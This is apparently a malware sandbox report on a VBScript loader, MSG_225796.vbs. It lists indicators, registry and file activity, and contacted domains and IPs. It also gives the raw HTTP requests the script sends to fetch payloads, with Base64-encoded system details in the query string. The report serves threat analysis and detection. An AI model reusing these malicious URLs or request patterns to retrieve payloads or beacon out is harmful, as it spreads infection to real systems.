MSG_225796.vbs
This report is generated from a file or URL submitted to this webservice on March 26th 2020 19:17:55 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 5 domains and 5 hosts.
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 5bdcc34ba4899862751be2f95a86723e0271ee0ab18517d4bc9949502beabcb8
Indicators
Not all malicious and suspicious indicators are displayed.
-
Malicious Indicators 4
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 3/60 Antivirus vendors marked sample as malicious (5% detection rate)
- source
- External System
- relevance
- 8/10
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "37.9.175.9": ...
URL: http://gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA (AV positives: 5/76 scanned on 03/26/2020 18:53:38)
URL: https://app.jtrbot.com/ (AV positives: 1/76 scanned on 03/26/2020 14:52:45)
URL: http://topfest.sk/misc/farbtastic/css/login/customer_center/customer-IDPP00C149/myaccount/signin (AV positives: 5/76 scanned on 03/26/2020 07:10:23)
URL: http://zeleneatrium.sk/media-o-nas/v-trnave-rastie-slovensky-unikat/engine1/style.css (AV positives: 1/76 scanned on 03/25/2020 15:16:10)
URL: http://zeleneatrium.sk/priebeh-vystavby/fotogaleria/2014-august/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/style.css (AV positives: 2/76 scanned on 03/24/2020 15:21:44)
- source
- Network Traffic
- relevance
- 10/10
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 5
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
-
(Indicator: "ntice")
- source
- File/Memory
- relevance
- 2/10
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
3/76 reputation engines marked "http://www.kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
3/76 reputation engines marked "http://kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://hotdsk.com" as malicious (2% detection rate)
- source
- External System
- relevance
- 10/10
-
Installation/Persistence
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_225796.vbs""
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73BE0000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 01970000
- source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
TCP traffic to 77.104.140.85 on port 80 is sent without HTTP header
- source
- Network Traffic
- relevance
- 5/10
-
Informative 14
-
General
-
Accesses Software Policy Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012
-
Accesses System Certificates Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Contacts domains
- details
-
"hotdsk.com"
"kitaair.com"
"gdpronline.sk"
"a.8xcornwall.com"
"www.kitaair.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"173.249.60.219:80"
"46.16.91.179:80"
"46.16.91.179:443"
"37.9.175.9:80"
"77.104.140.85:80"
- source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 6C610000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ...
- source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
"wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
"wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS")
- source
- Registry Access
- relevance
- 3/10
-
Installation/Persistence
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\en-US\wscript.exe.mui"
"wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
"wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "hotdsk.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: hotdsk.com"
Heuristic match: "kitaair.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: kitaair.com"
Heuristic match: "gdpronline.sk"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: gdpronline.sk"
Heuristic match: "a.8xcornwall.com"
Heuristic match: "GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: a.8xcornwall.com"
Pattern match: "www.kitaair.com"
- source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- "blackishness staphyloplastic Physoderma expansionists Tolypeutes Manzanola Neo-hebrew fusspot examens unamazedly microcythemia aschaffite polysyllabic wagonload glottogony Barco subdichotomously graecophil semiflexible Swatchel Boiko smelt- diipenates eburine Theressa Eucalyptus pseudo-intransitive liven Tamera Aclemon mazuca spookiness tendineal peristeromorphous chello metoestrous Eranthemum boltant brinjarry desynchronize reheater licour dikkop Lobale Sagunto Nemesis Eastwood rainbands Polonial Harpies hydrofluate premise tradesfolk chagrinned strength-decaying dotier sudes twittery counterdemonstration processs" (Indicator: "twitter")
- source
- File/Memory
- relevance
- 7/10
-
System Security
-
Creates or modifies Windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Modifies Software Policy Settings
- details
-
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "e7397477e1a678772e717877ee29787785e273776da07877906477773ad57e7726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74FF1000" (part of module "WSHIP6.DLL")
"wscript.exe" wrote bytes "39c860b0" to virtual address "0x6D1B1FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "fae67377e1a678772e717877ee29787785e273776da0787726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74AC1000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "c04e767720547777e0657777b53878770000000000d09b7500000000c5ea9b750000000088ea9b7500000000e9687d7582287877ee29787700000000d2697d75000000007dbb9b750000000009be7d7500000000ba189b7500000000" to virtual address "0x77131000" (part of module "NSI.DLL")
- source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
File Details
MSG_225796.vbs
- Filename
- MSG_225796.vbs
- Size
- 925KiB (947565 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- a9246a824a769730eb6ecbbe974adb9390744a984c9385a64a9a8d16a6fcf5eb
- MD5
- ea996a38945983e7eb5be1389b15201f
- SHA1
- e0635812720a7563e1fcbadfec0210a7309c70ec
- ssdeep
- 12288:kN062C4FlSOqpolnrrFU8pOTNgbw/ZCkiS4ZRHLtRagHUFAXpkMW:kNYHgOJlnrrFjpORgAZCxV0K5K
Hybrid Analysis
Analysed 1 process in total.
- wscript.exe "C:\MSG_225796.vbs" (PID: 3192)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
a.8xcornwall.com | 77.104.140.85 (TTL: 11945) | - | Bulgaria |
gdpronline.sk | 37.9.175.9 (TTL: 599) | - | Slovakia (SLOVAK Republic) |
hotdsk.com | 173.249.60.219 (TTL: 14399) | Innovadeus Pvt. Ltd. | Germany |
kitaair.com | 46.16.91.179 (TTL: 21599) | - | Italy |
www.kitaair.com | 46.16.91.179 (TTL: 19821) | - | Italy |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
173.249.60.219 | 80 TCP | wscript.exe PID: 3192 | Germany |
46.16.91.179 | 80 TCP | wscript.exe PID: 3192 | Italy |
46.16.91.179 | 443 TCP | wscript.exe PID: 3192 | Italy |
37.9.175.9 | 80 TCP | wscript.exe PID: 3192 | Slovakia (SLOVAK Republic) |
77.104.140.85 | 80 TCP | wscript.exe PID: 3192 | Bulgaria |
HTTP Traffic
Endpoint | Request | URL | Raw request |
---|---|---|---|
173.249.60.219:80 (hotdsk.com) | GET | hotdsk.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: hotdsk.com |
46.16.91.179:80 (kitaair.com) | GET | kitaair.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: kitaair.com |
37.9.175.9:80 (gdpronline.sk) | GET | gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: gdpronline.sk |
77.104.140.85:80 (a.8xcornwall.com) | GET | a.8xcornwall.com/12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: a.8xcornwall.com |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 173.249.60.219:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 46.16.91.179:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 77.104.140.85:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 37.9.175.9:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report
- Not all sources for indicator ID "registry-17" are available in the report
- Not all sources for indicator ID "registry-18" are available in the report
- Not all sources for indicator ID "registry-19" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report